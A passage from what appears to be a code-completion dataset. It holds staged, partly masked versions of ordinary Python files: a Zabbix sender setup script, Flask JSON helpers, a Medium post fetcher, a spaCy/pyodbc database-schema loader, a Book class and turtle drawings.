"step-5": "#!/usr/bin/env python\nimport os\nimport sys\nfrom setuptools import setup\nfrom textwrap import dedent\n\nNAME = \"docker-zabbix-script-sender\"\nGITHUB_ORG_URL = \"https://github.com/troptop/\"\nROOT_DIR = os.path.dirname(__file__)\nSOURCE_DIR = os.path.join(ROOT_DIR)\n\nexec(open('docker_zabbix_script_sender/version.py').read())\n\nsetup(\n name=NAME,\n version=version,\n author=\"Cyril Moreau\",\n author_email=\"[email protected]\",\n url= GITHUB_ORG_URL + '/' + NAME,\n download_url=\"{0}/{1}/tarball/v{2}\".format(GITHUB_ORG_URL, NAME, version),\n description=\"Push Docker containers script results to Zabbix efficiently\",\n long_description=dedent(\"\"\"\n Rationale\n ---------\n Docker Zabbix Sender delivers a daemon script that push to Zabbix statistics about Docker containers.\n\n It leverages 3 interesting components:\n\n - Zabbix maintains a tool titled ``zabbix-sender``.\n It is meant to push `Zabbix trapper items`_ efficiently.\n\n\t- Develop your own scripts to monitor your docker container\n\n - Docker 1.5.0 comes with Docker Remote API version 17, providing a new `stats endpoint`_.\n It allows the client to subscribe to a live feed delivering a container statistics.\n\n The daemon script stands in the middle of those 3 components.\n It collects Docker containers statistics and transforms them in Zabbix trapper events.\n\n Published metrics\n -----------------\n The daemon script does not publish any statistic yet.\n\tYou have to develop your own script\n\n Documentation\n -------------\n The stable documentation is available on ReadTheDocs_\n\n \"\"\"),\n keywords=\"docker zabbix monitoring\",\n packages=['docker_zabbix_script_sender'],\n install_requires=[\n 'docker-py >= 1.0.0',\n ],\n zip_safe=False,\n license=\"Apache license version 2.0\",\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: Other Environment',\n 'Intended Audience :: Developers',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.2',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4',\n 'Topic :: Utilities',\n 'License :: OSI Approved :: Apache Software License',\n ],\n entry_points = \"\"\"\n [console_scripts]\n docker-zabbix-script-sender = docker_zabbix_script_sender.zabbix_sender:run\n \"\"\"\n)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
step_ids: [0, 1, 2, 3, 4]

code:
#!/usr/bin/python
# -*- coding: utf-8 -*-
import json
from flask import jsonify
from flask import make_response
from MultipleInterfaceManager.settings import STATUS_CODE
def _render(resp):
response = make_response(jsonify(resp))
# response.headers["Access-Control-Allow-Origin"] = "*"
return response
def json_list_render(code, data, limit, offset, message = None):
if message is None:
message = STATUS_CODE.get(code)
resp = dict(
code = code,
limit = limit,
offset = offset,
message = message,
data = data
)
return _render(resp)
def json_detail_render(code, data = [], message = None):
if message is None:
message = STATUS_CODE.get(code)
resp = dict(
code = code,
message = message,
data = data
)
return _render(resp)
def json_token_render(code, token, message = None):
if message is None:
message = STATUS_CODE.get(code)
resp = dict(
code = code,
token = token,
message = message
)
return _render(resp)
def json_detail_render_sse(code, data = [], message = None):
if message is None:
message = STATUS_CODE.get(code)
resp = dict(code=code, message=message, data=data)
return json.dumps(resp)
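A short sketch of how these helpers might be used from a Flask view; the app, the route, and the code 200 are illustrative, and `STATUS_CODE` is assumed to map 200 to a human-readable message.

# Illustrative view built on the helpers above.
from flask import Flask

app = Flask(__name__)

@app.route('/api/items/<int:item_id>')
def get_item(item_id):
    data = {'id': item_id, 'name': 'example'}
    # message=None falls back to STATUS_CODE.get(200)
    return json_detail_render(200, data=data)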
order_type: normal

original_example:
{
"blob_id": "a87ab07bb1502a75a7e705cd5c92db829ebdd966",
"index": 8689,
"step-1": "<mask token>\n\n\ndef _render(resp):\n response = make_response(jsonify(resp))\n return response\n\n\n<mask token>\n\n\ndef json_detail_render(code, data=[], message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, message=message, data=data)\n return _render(resp)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef _render(resp):\n response = make_response(jsonify(resp))\n return response\n\n\ndef json_list_render(code, data, limit, offset, message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, limit=limit, offset=offset, message=message,\n data=data)\n return _render(resp)\n\n\ndef json_detail_render(code, data=[], message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, message=message, data=data)\n return _render(resp)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef _render(resp):\n response = make_response(jsonify(resp))\n return response\n\n\ndef json_list_render(code, data, limit, offset, message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, limit=limit, offset=offset, message=message,\n data=data)\n return _render(resp)\n\n\ndef json_detail_render(code, data=[], message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, message=message, data=data)\n return _render(resp)\n\n\ndef json_token_render(code, token, message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, token=token, message=message)\n return _render(resp)\n\n\ndef json_detail_render_sse(code, data=[], message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, message=message, data=data)\n return json.dumps(resp)\n",
"step-4": "import json\nfrom flask import jsonify\nfrom flask import make_response\nfrom MultipleInterfaceManager.settings import STATUS_CODE\n\n\ndef _render(resp):\n response = make_response(jsonify(resp))\n return response\n\n\ndef json_list_render(code, data, limit, offset, message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, limit=limit, offset=offset, message=message,\n data=data)\n return _render(resp)\n\n\ndef json_detail_render(code, data=[], message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, message=message, data=data)\n return _render(resp)\n\n\ndef json_token_render(code, token, message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, token=token, message=message)\n return _render(resp)\n\n\ndef json_detail_render_sse(code, data=[], message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, message=message, data=data)\n return json.dumps(resp)\n",
"step-5": "#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport json\r\n\r\nfrom flask import jsonify\r\nfrom flask import make_response\r\nfrom MultipleInterfaceManager.settings import STATUS_CODE\r\n\r\n\r\ndef _render(resp):\r\n response = make_response(jsonify(resp))\r\n# response.headers[\"Access-Control-Allow-Origin\"] = \"*\"\r\n return response\r\n\r\n\r\n\r\ndef json_list_render(code, data, limit, offset, message = None):\r\n if message is None:\r\n message = STATUS_CODE.get(code)\r\n resp = dict(\r\n code = code,\r\n limit = limit,\r\n offset = offset,\r\n message = message,\r\n data = data\r\n )\r\n return _render(resp)\r\n\r\n\r\n\r\ndef json_detail_render(code, data = [], message = None):\r\n if message is None:\r\n message = STATUS_CODE.get(code)\r\n resp = dict(\r\n code = code,\r\n message = message,\r\n data = data\r\n )\r\n return _render(resp)\r\n\r\n\r\ndef json_token_render(code, token, message = None):\r\n if message is None:\r\n message = STATUS_CODE.get(code)\r\n resp = dict(\r\n code = code,\r\n token = token,\r\n message = message\r\n )\r\n return _render(resp)\r\n\r\ndef json_detail_render_sse(code, data = [], message = None):\r\n if message is None:\r\n message = STATUS_CODE.get(code)\r\n resp = dict(code=code, message=message, data=data)\r\n return json.dumps(resp)\r\n",
"step-ids": [
2,
3,
5,
6,
7
]
}
step_ids: [2, 3, 5, 6, 7]

code:
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main(app, data):
MEDIUM_API_ENDPOINT = 'https://medium.com/{0}/latest?format=json'
r = requests.get(MEDIUM_API_ENDPOINT.format(data.get('username')))
response_content = r.content.decode('utf-8')
json_data = response_content.lstrip('])}while(1);</x>')
return json.loads(json_data)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
try:
import json
except ImportError:
import simplejson as json
def main(app, data):
MEDIUM_API_ENDPOINT = 'https://medium.com/{0}/latest?format=json'
r = requests.get(MEDIUM_API_ENDPOINT.format(data.get('username')))
response_content = r.content.decode('utf-8')
json_data = response_content.lstrip('])}while(1);</x>')
return json.loads(json_data)
<|reserved_special_token_1|>
from __future__ import unicode_literals
import requests
try:
import json
except ImportError:
import simplejson as json
def main(app, data):
MEDIUM_API_ENDPOINT = 'https://medium.com/{0}/latest?format=json'
r = requests.get(MEDIUM_API_ENDPOINT.format(data.get('username')))
response_content = r.content.decode('utf-8')
json_data = response_content.lstrip('])}while(1);</x>')
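# Note: str.lstrip strips a *set* of characters, not a literal prefix; it is
# safe here because valid JSON starts with '{' or '[', neither of which is in
# Medium's anti-JSON-hijacking guard string.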
return json.loads(json_data)
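A hedged invocation sketch; `main` ignores its `app` argument, and the `success`/`payload` keys reflect the shape Medium's legacy `?format=json` responses used to have, which is an assumption here.

# Illustrative call; main() never touches `app`, so None suffices.
posts = main(None, {'username': '@medium'})
print(posts.get('success'))                    # assumed key in Medium's legacy response
print(list(posts.get('payload', {}).keys()))   # assumed key; shape may have changed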
order_type: flexible

original_example:
{
"blob_id": "96936b7f6553bee06177eb66a2e63064c1bf51a6",
"index": 8373,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main(app, data):\n MEDIUM_API_ENDPOINT = 'https://medium.com/{0}/latest?format=json'\n r = requests.get(MEDIUM_API_ENDPOINT.format(data.get('username')))\n response_content = r.content.decode('utf-8')\n json_data = response_content.lstrip('])}while(1);</x>')\n return json.loads(json_data)\n",
"step-3": "<mask token>\ntry:\n import json\nexcept ImportError:\n import simplejson as json\n\n\ndef main(app, data):\n MEDIUM_API_ENDPOINT = 'https://medium.com/{0}/latest?format=json'\n r = requests.get(MEDIUM_API_ENDPOINT.format(data.get('username')))\n response_content = r.content.decode('utf-8')\n json_data = response_content.lstrip('])}while(1);</x>')\n return json.loads(json_data)\n",
"step-4": "from __future__ import unicode_literals\nimport requests\ntry:\n import json\nexcept ImportError:\n import simplejson as json\n\n\ndef main(app, data):\n MEDIUM_API_ENDPOINT = 'https://medium.com/{0}/latest?format=json'\n r = requests.get(MEDIUM_API_ENDPOINT.format(data.get('username')))\n response_content = r.content.decode('utf-8')\n json_data = response_content.lstrip('])}while(1);</x>')\n return json.loads(json_data)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
step_ids: [0, 1, 2, 3]

code:
<|reserved_special_token_0|>
class DBModel(object):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def get_matcher(self, matcher, nlp):
for entity in self.entities:
matcher.add(entity.name.upper() + '_TABLE', None, nlp(entity.
name.lower()))
for column in entity.columns:
matcher.add(column.name.upper() + '_COLUMN', None, nlp(
column.name.lower()))
for synonym in self.synonyms_tab:
for entity in self.entities:
if synonym.column.lower() == entity.name.lower():
matcher.add(entity.name.upper() + '_TABLE', None, nlp(
synonym.synonym.lower()))
for synonym in self.synonyms_col:
for column in self.columns:
if synonym.column.lower() == column.name.lower():
matcher.add(column.name.upper() + '_COLUMN', None, nlp(
synonym.synonym.lower()))
return matcher
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class DBModel(object):
<|reserved_special_token_0|>
def load_db_model(self):
cursor = self.conn.cursor()
cursor.execute(self.config.get_tables_sql_query())
for row in cursor:
self.entities.append(Entities(row.table_name, self.config.
get_default_column(row.table_name)))
cursor.execute(self.config.get_columns_sql_query())
current_entity = None
current_entity_name = ''
for row in cursor:
if current_entity_name != row.table_name:
current_entity_name = row.table_name
current_entity = next(en for en in self.entities if en.name ==
current_entity_name)
col_type = row.type_name
if col_type == 'varchar' or col_type == 'nvarchar':
col_type = 'string'
current_entity.columns.append(Columns(row.column_name, col_type))
current_entity = None
current_entity_name = ''
cursor.execute(self.config.get_FK_sql_query())
for row in cursor:
self.relationships.append(Relationship(row.parent_table, row.
refrenced_table, row.parent_table_col, row.
referenced_table_col))
if len([en for en in self.entity_graph if en[0] == row.
parent_table]) > 0:
current_entity = next(en for en in self.entity_graph if en[
0] == row.parent_table)
current_entity[1].append(row.refrenced_table)
else:
self.entity_graph.append((row.parent_table, [row.
refrenced_table]))
if len([en for en in self.entity_graph if en[0] == row.
refrenced_table]) > 0:
current_entity = next(en for en in self.entity_graph if en[
0] == row.refrenced_table)
current_entity[1].append(row.parent_table)
else:
self.entity_graph.append((row.refrenced_table, [row.
parent_table]))
current_entity = None
current_entity_name = ''
cursor.execute(self.config.get_PK_sql_query())
for row in cursor:
if len([en for en in self.entity_graph if en[0] == row.table_name]
) == 1:
current_entity = next(en for en in self.entities if en.name ==
row.table_name)
current_entity.primaryKey = row.primary_key
for entity_to_load in self.config.get_entitites_to_load():
entity_load_query = 'select distinct ' + entity_to_load['column'
] + ' from ' + entity_to_load['entity']
cursor.execute(entity_load_query)
entity_data = entity_to_load['entity'], []
for row in cursor:
entity_data[1].append(row[0])
lemmas = self.lemmatizer(str(row[0]), u'NOUN')
for lemma in lemmas:
entity_data[1].append(str(lemma))
self.loaded_entities.append(entity_data)
for table_synonym in self.config.get_synonyms()['table']:
orginal_val = table_synonym['original']
synonyms_vals = table_synonym['synonyms']
for synonyms_val in synonyms_vals:
self.synonyms_tab.append(Synonyms(orginal_val, synonyms_val))
for column_synonym in self.config.get_synonyms()['column']:
orginal_val = column_synonym['original']
synonyms_vals = column_synonym['synonyms']
for synonyms_val in synonyms_vals:
self.synonyms_col.append(Synonyms(orginal_val, synonyms_val))
self.columns = [column for entity in self.entities for column in
entity.columns]
def get_matcher(self, matcher, nlp):
for entity in self.entities:
matcher.add(entity.name.upper() + '_TABLE', None, nlp(entity.
name.lower()))
for column in entity.columns:
matcher.add(column.name.upper() + '_COLUMN', None, nlp(
column.name.lower()))
for synonym in self.synonyms_tab:
for entity in self.entities:
if synonym.column.lower() == entity.name.lower():
matcher.add(entity.name.upper() + '_TABLE', None, nlp(
synonym.synonym.lower()))
for synonym in self.synonyms_col:
for column in self.columns:
if synonym.column.lower() == column.name.lower():
matcher.add(column.name.upper() + '_COLUMN', None, nlp(
synonym.synonym.lower()))
return matcher
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class DBModel(object):
<|reserved_special_token_0|>
def load_db_model(self):
cursor = self.conn.cursor()
cursor.execute(self.config.get_tables_sql_query())
for row in cursor:
self.entities.append(Entities(row.table_name, self.config.
get_default_column(row.table_name)))
cursor.execute(self.config.get_columns_sql_query())
current_entity = None
current_entity_name = ''
for row in cursor:
if current_entity_name != row.table_name:
current_entity_name = row.table_name
current_entity = next(en for en in self.entities if en.name ==
current_entity_name)
col_type = row.type_name
if col_type == 'varchar' or col_type == 'nvarchar':
col_type = 'string'
current_entity.columns.append(Columns(row.column_name, col_type))
current_entity = None
current_entity_name = ''
cursor.execute(self.config.get_FK_sql_query())
for row in cursor:
self.relationships.append(Relationship(row.parent_table, row.
refrenced_table, row.parent_table_col, row.
referenced_table_col))
if len([en for en in self.entity_graph if en[0] == row.
parent_table]) > 0:
current_entity = next(en for en in self.entity_graph if en[
0] == row.parent_table)
current_entity[1].append(row.refrenced_table)
else:
self.entity_graph.append((row.parent_table, [row.
refrenced_table]))
if len([en for en in self.entity_graph if en[0] == row.
refrenced_table]) > 0:
current_entity = next(en for en in self.entity_graph if en[
0] == row.refrenced_table)
current_entity[1].append(row.parent_table)
else:
self.entity_graph.append((row.refrenced_table, [row.
parent_table]))
current_entity = None
current_entity_name = ''
cursor.execute(self.config.get_PK_sql_query())
for row in cursor:
if len([en for en in self.entity_graph if en[0] == row.table_name]
) == 1:
current_entity = next(en for en in self.entities if en.name ==
row.table_name)
current_entity.primaryKey = row.primary_key
for entity_to_load in self.config.get_entitites_to_load():
entity_load_query = 'select distinct ' + entity_to_load['column'
] + ' from ' + entity_to_load['entity']
cursor.execute(entity_load_query)
entity_data = entity_to_load['entity'], []
for row in cursor:
entity_data[1].append(row[0])
lemmas = self.lemmatizer(str(row[0]), u'NOUN')
for lemma in lemmas:
entity_data[1].append(str(lemma))
self.loaded_entities.append(entity_data)
for table_synonym in self.config.get_synonyms()['table']:
orginal_val = table_synonym['original']
synonyms_vals = table_synonym['synonyms']
for synonyms_val in synonyms_vals:
self.synonyms_tab.append(Synonyms(orginal_val, synonyms_val))
for column_synonym in self.config.get_synonyms()['column']:
orginal_val = column_synonym['original']
synonyms_vals = column_synonym['synonyms']
for synonyms_val in synonyms_vals:
self.synonyms_col.append(Synonyms(orginal_val, synonyms_val))
self.columns = [column for entity in self.entities for column in
entity.columns]
def get_matcher(self, matcher, nlp):
for entity in self.entities:
matcher.add(entity.name.upper() + '_TABLE', None, nlp(entity.
name.lower()))
for column in entity.columns:
matcher.add(column.name.upper() + '_COLUMN', None, nlp(
column.name.lower()))
for synonym in self.synonyms_tab:
for entity in self.entities:
if synonym.column.lower() == entity.name.lower():
matcher.add(entity.name.upper() + '_TABLE', None, nlp(
synonym.synonym.lower()))
for synonym in self.synonyms_col:
for column in self.columns:
if synonym.column.lower() == column.name.lower():
matcher.add(column.name.upper() + '_COLUMN', None, nlp(
synonym.synonym.lower()))
return matcher
def get_custom_matcher(self, matcher, nlp):
for entity in self.entities:
matcher.add(entity.name.upper() + '_TABLE', nlp(entity.name.
lower()))
for column in entity.columns:
matcher.add(column.name.upper() + '_COLUMN', nlp(column.
name.lower()))
for synonym in self.synonyms_tab:
for entity in self.entities:
if synonym.column.lower() == entity.name.lower():
matcher.add(entity.name.upper() + '_TABLE', nlp(synonym
.synonym.lower()))
for synonym in self.synonyms_col:
for column in self.columns:
if synonym.column.lower() == column.name.lower():
matcher.add(column.name.upper() + '_COLUMN', nlp(
synonym.synonym.lower()))
return matcher
<|reserved_special_token_1|>
import pyodbc
from configuration.config import Configuration
from models.entities import Entities
from models.columns import Columns
from models.relationships import Relationship
from models.synonyms import Synonyms
from spacy.lemmatizer import Lemmatizer
from spacy.lookups import Lookups
class DBModel(object):
def __init__(self):
self.entities = []
self.columns = []
self.relationships = []
self.synonyms_col = []
self.synonyms_tab = []
self.entity_graph = []
self.loaded_entities = []
self.config = Configuration()
self.conn = pyodbc.connect(self.config.get_sql_connection_string())
lookups = Lookups()
self.lemmatizer = Lemmatizer(lookups)
self.load_db_model()
def load_db_model(self):
cursor = self.conn.cursor()
cursor.execute(self.config.get_tables_sql_query())
for row in cursor:
self.entities.append(Entities(row.table_name, self.config.
get_default_column(row.table_name)))
cursor.execute(self.config.get_columns_sql_query())
current_entity = None
current_entity_name = ''
for row in cursor:
if current_entity_name != row.table_name:
current_entity_name = row.table_name
current_entity = next(en for en in self.entities if en.name ==
current_entity_name)
col_type = row.type_name
if col_type == 'varchar' or col_type == 'nvarchar':
col_type = 'string'
current_entity.columns.append(Columns(row.column_name, col_type))
current_entity = None
current_entity_name = ''
cursor.execute(self.config.get_FK_sql_query())
for row in cursor:
self.relationships.append(Relationship(row.parent_table, row.
refrenced_table, row.parent_table_col, row.
referenced_table_col))
if len([en for en in self.entity_graph if en[0] == row.
parent_table]) > 0:
current_entity = next(en for en in self.entity_graph if en[
0] == row.parent_table)
current_entity[1].append(row.refrenced_table)
else:
self.entity_graph.append((row.parent_table, [row.
refrenced_table]))
if len([en for en in self.entity_graph if en[0] == row.
refrenced_table]) > 0:
current_entity = next(en for en in self.entity_graph if en[
0] == row.refrenced_table)
current_entity[1].append(row.parent_table)
else:
self.entity_graph.append((row.refrenced_table, [row.
parent_table]))
current_entity = None
current_entity_name = ''
cursor.execute(self.config.get_PK_sql_query())
for row in cursor:
if len([en for en in self.entity_graph if en[0] == row.table_name]
) == 1:
current_entity = next(en for en in self.entities if en.name ==
row.table_name)
current_entity.primaryKey = row.primary_key
for entity_to_load in self.config.get_entitites_to_load():
entity_load_query = 'select distinct ' + entity_to_load['column'
] + ' from ' + entity_to_load['entity']
cursor.execute(entity_load_query)
entity_data = entity_to_load['entity'], []
for row in cursor:
entity_data[1].append(row[0])
lemmas = self.lemmatizer(str(row[0]), u'NOUN')
for lemma in lemmas:
entity_data[1].append(str(lemma))
self.loaded_entities.append(entity_data)
for table_synonym in self.config.get_synonyms()['table']:
orginal_val = table_synonym['original']
synonyms_vals = table_synonym['synonyms']
for synonyms_val in synonyms_vals:
self.synonyms_tab.append(Synonyms(orginal_val, synonyms_val))
for column_synonym in self.config.get_synonyms()['column']:
orginal_val = column_synonym['original']
synonyms_vals = column_synonym['synonyms']
for synonyms_val in synonyms_vals:
self.synonyms_col.append(Synonyms(orginal_val, synonyms_val))
self.columns = [column for entity in self.entities for column in
entity.columns]
def get_matcher(self, matcher, nlp):
for entity in self.entities:
matcher.add(entity.name.upper() + '_TABLE', None, nlp(entity.
name.lower()))
for column in entity.columns:
matcher.add(column.name.upper() + '_COLUMN', None, nlp(
column.name.lower()))
for synonym in self.synonyms_tab:
for entity in self.entities:
if synonym.column.lower() == entity.name.lower():
matcher.add(entity.name.upper() + '_TABLE', None, nlp(
synonym.synonym.lower()))
for synonym in self.synonyms_col:
for column in self.columns:
if synonym.column.lower() == column.name.lower():
matcher.add(column.name.upper() + '_COLUMN', None, nlp(
synonym.synonym.lower()))
return matcher
def get_custom_matcher(self, matcher, nlp):
for entity in self.entities:
matcher.add(entity.name.upper() + '_TABLE', nlp(entity.name.
lower()))
for column in entity.columns:
matcher.add(column.name.upper() + '_COLUMN', nlp(column.
name.lower()))
for synonym in self.synonyms_tab:
for entity in self.entities:
if synonym.column.lower() == entity.name.lower():
matcher.add(entity.name.upper() + '_TABLE', nlp(synonym
.synonym.lower()))
for synonym in self.synonyms_col:
for column in self.columns:
if synonym.column.lower() == column.name.lower():
matcher.add(column.name.upper() + '_COLUMN', nlp(
synonym.synonym.lower()))
return matcher
<|reserved_special_token_1|>
import pyodbc
from configuration.config import Configuration
from models.entities import Entities
from models.columns import Columns
from models.relationships import Relationship
from models.synonyms import Synonyms
from spacy.lemmatizer import Lemmatizer
from spacy.lookups import Lookups
class DBModel(object):
def __init__(self):
self.entities = []
self.columns = []
self.relationships = []
self.synonyms_col = []
self.synonyms_tab = []
self.entity_graph = []
self.loaded_entities = []
self.config = Configuration()
self.conn = pyodbc.connect(self.config.get_sql_connection_string())
lookups = Lookups()
self.lemmatizer = Lemmatizer(lookups)
self.load_db_model()
def load_db_model(self):
# load the database model (tables, columns, keys) from SQL Server
cursor = self.conn.cursor()
cursor.execute(self.config.get_tables_sql_query())
for row in cursor:
self.entities.append(Entities(row.table_name, self.config.get_default_column(row.table_name)))
cursor.execute(self.config.get_columns_sql_query())
current_entity = None
current_entity_name = ""
for row in cursor:
if current_entity_name != row.table_name:
current_entity_name = row.table_name
current_entity = next(en for en in self.entities if en.name == current_entity_name)
col_type = row.type_name
if col_type == "varchar" or col_type == "nvarchar":
col_type = "string"
current_entity.columns.append(Columns(row.column_name, col_type))
current_entity = None
current_entity_name = ""
cursor.execute(self.config.get_FK_sql_query())
for row in cursor:
self.relationships.append(Relationship(row.parent_table, row.refrenced_table, row.parent_table_col, row.referenced_table_col))
if len([en for en in self.entity_graph if en[0] == row.parent_table]) > 0:
current_entity = next(en for en in self.entity_graph if en[0] == row.parent_table)
current_entity[1].append(row.refrenced_table)
else:
self.entity_graph.append((row.parent_table, [row.refrenced_table]))
if len([en for en in self.entity_graph if en[0] == row.refrenced_table]) > 0:
current_entity = next(en for en in self.entity_graph if en[0] == row.refrenced_table)
current_entity[1].append(row.parent_table)
else:
self.entity_graph.append((row.refrenced_table, [row.parent_table]))
current_entity = None
current_entity_name = ""
cursor.execute(self.config.get_PK_sql_query())
for row in cursor:
if len([en for en in self.entity_graph if en[0] == row.table_name]) == 1:
current_entity = next(en for en in self.entities if en.name == row.table_name)
current_entity.primaryKey = row.primary_key
for entity_to_load in self.config.get_entitites_to_load():
entity_load_query = "select distinct " + entity_to_load["column"] + " from " + entity_to_load["entity"]
cursor.execute(entity_load_query)
entity_data = (entity_to_load["entity"], [])
for row in cursor:
entity_data[1].append(row[0])
# add lemma strings
lemmas = self.lemmatizer(str(row[0]), u'NOUN')
for lemma in lemmas:
entity_data[1].append(str(lemma))
self.loaded_entities.append(entity_data)
# load synonyms from declarative file
# table synonyms
for table_synonym in self.config.get_synonyms()["table"]:
orginal_val = table_synonym["original"]
synonyms_vals = table_synonym["synonyms"]
for synonyms_val in synonyms_vals:
self.synonyms_tab.append(Synonyms(orginal_val, synonyms_val))
        # column synonyms
        for column_synonym in self.config.get_synonyms()["column"]:
            original_val = column_synonym["original"]
            synonyms_vals = column_synonym["synonyms"]
            for synonyms_val in synonyms_vals:
                self.synonyms_col.append(Synonyms(original_val, synonyms_val))
        # flatten every entity's columns into a single list
        self.columns = [column for entity in self.entities for column in entity.columns]
# might have to write a custom matcher TODO
# build the matcher based upon the original value and domain synonyms defined
def get_matcher(self, matcher, nlp):
for entity in self.entities:
matcher.add(entity.name.upper() + "_TABLE", None, nlp(entity.name.lower()))
for column in entity.columns:
matcher.add(column.name.upper() + "_COLUMN", None, nlp(column.name.lower()))
# add table synonyms to matcher
for synonym in self.synonyms_tab:
for entity in self.entities:
if synonym.column.lower() == entity.name.lower():
matcher.add(entity.name.upper() + "_TABLE", None, nlp(synonym.synonym.lower()))
# add column synonyms to matcher
for synonym in self.synonyms_col:
for column in self.columns:
if synonym.column.lower() == column.name.lower():
matcher.add(column.name.upper() + "_COLUMN", None, nlp(synonym.synonym.lower()))
return matcher
    # variant of get_matcher for matchers whose add() takes no on_match callback
    def get_custom_matcher(self, matcher, nlp):
for entity in self.entities:
matcher.add(entity.name.upper() + "_TABLE", nlp(entity.name.lower()))
for column in entity.columns:
matcher.add(column.name.upper() + "_COLUMN", nlp(column.name.lower()))
# add table synonyms to matcher
for synonym in self.synonyms_tab:
for entity in self.entities:
if synonym.column.lower() == entity.name.lower():
matcher.add(entity.name.upper() + "_TABLE", nlp(synonym.synonym.lower()))
# add column synonyms to matcher
for synonym in self.synonyms_col:
for column in self.columns:
if synonym.column.lower() == column.name.lower():
matcher.add(column.name.upper() + "_COLUMN", nlp(synonym.synonym.lower()))
return matcher
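
# Usage sketch -- a minimal illustration, assuming spaCy 2.x (whose
# PhraseMatcher.add(key, None, doc) signature the get_matcher calls above
# target), a working connection string behind Configuration, and
# "en_core_web_sm" as a stand-in model name:
#
#   import spacy
#   from spacy.matcher import PhraseMatcher
#
#   nlp = spacy.load("en_core_web_sm")
#   db_model = DBModel()                    # connects and loads the schema
#   matcher = db_model.get_matcher(PhraseMatcher(nlp.vocab), nlp)
#   doc = nlp("show all customers")
#   for match_id, start, end in matcher(doc):
#       print(nlp.vocab.strings[match_id], doc[start:end].text)
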
class Book:
    """Class that defines the book model."""

    def __init__(self, title, authors, pub_year):
self.title = title
self.authors = authors
self.pub_year = pub_year
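
# Usage sketch (the sample data is illustrative only):
#
#   book = Book("Fluent Python", ["Luciano Ramalho"], 2015)
#   print(book.title, book.pub_year)   # -> Fluent Python 2015
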
from turtle import *
from shapes import *
# 1- one function per basic shape
# NOTE: square() and circle() are named my_square()/my_circle() here so they
# do not shadow the parameterised square()/circle() helpers that the shapes
# module provides and that sections 4 and 5 call. None of these functions
# calls mainloop() -- it blocks until the window closes, so callers (e.g.
# section 2) invoke mainloop() once at the end instead.

# 1. triangle
def eTriangle():
    for _ in range(3):
        forward(100)
        right(120)

# 2. square
def my_square():
    for _ in range(4):
        forward(100)
        right(90)

# 3. pentagon
def pentagon():
    for _ in range(5):
        forward(100)
        right(72)

# 4. hexagon
def hexagon():
    for _ in range(6):
        forward(100)
        right(60)

# 5. octagon
def octagon():
    for _ in range(8):
        forward(100)
        right(45)

# 6. star
def star():
    for _ in range(5):
        forward(100)
        right(144)

# 7. circle (approximated by many short segments)
def my_circle():
    for _ in range(370):
        forward(2)
        right(1)
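
# A generic sketch of the shared pattern -- n sides with an exterior turn of
# 360/n degrees -- offered as an aside, not part of the original exercise
# (the star is the exception: its turn is 144 degrees, i.e. 720/5):
def polygon(sides, length=100):
    for _ in range(sides):
        forward(length)
        right(360 / sides)
# e.g. polygon(6) retraces the hexagon drawn by hexagon() above.
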
# 2- draw all seven shapes in sequence, with a single mainloop() at the end
eTriangle()
my_square()
pentagon()
hexagon()
octagon()
star()
my_circle()
mainloop()
# 3- starry night sky: scatter eleven stars with (turn, distance) moves,
# then draw a grey moon
bgcolor("MidnightBlue")
moves = [(20, 100), (30, 150), (40, 200), (50, 250), (60, 300),
         (0, 100), (0, 100), (-90, 300), (50, 300), (50, 300), (50, 275)]
for turn, dist in moves:
    starp(20, True, "yellow", "MidnightBlue")
    right(turn)
    forward(dist)
circlep(3, True, "SlateGrey", "MidnightBlue")
right(60)
forward(20)
mainloop()
# 4- house scene drawn inline (section 5 refactors it into functions)
bgcolor("skyblue")
right(90)
penup()
forward(100)
right(90)
forward(200)
# grass
fillcolor("Green")
begin_fill()
forward(300)
left(90)
forward(300)
left(90)
forward(1250)
left(90)
forward(300)
left(90)
forward(1000)
end_fill()
right(90)
pendown()
# house body
rectangle(200, 450, True, "Red")
left(180)
forward(200)
left(90)
penup()
forward(100)
right(90)
pendown()
# door
rectangle(50, 100, True, "Brown")
penup()
right(90)
forward(50)
right(90)
forward(50)
right(90)
forward(10)
# doorknob -- presumably the shapes module's circle(radius, fill, color) helper
circle(.1, True, "Black")
penup()
forward(40)
left(90)
forward(50)
pendown()
fillcolor("grey")
begin_fill()
left (20)
forward(400)
left (75)
forward(50)
left(105)
forward(400)
left(75)
forward(50)
end_fill()
right(5)
penup()
forward(200)
right(90)
forward(200)
right(90)
left(40)
pendown()
fillcolor("brown")
begin_fill()
forward(293.717)
right(80)
forward(293.717)
right(140)
forward(450)
end_fill()
penup()
left(90)
forward(75)
left(90)
forward(75)
pendown()
square(50, True, "blue", "Black")
right(90)
square(25, False, "blue", "black")
right(90)
forward(50)
right(90)
forward(25)
square(25, False, "blue", "black")
penup()
left(90)
forward(25)
right(90)
forward(200)
pendown()
square(50, True, "blue", "Black")
right(90)
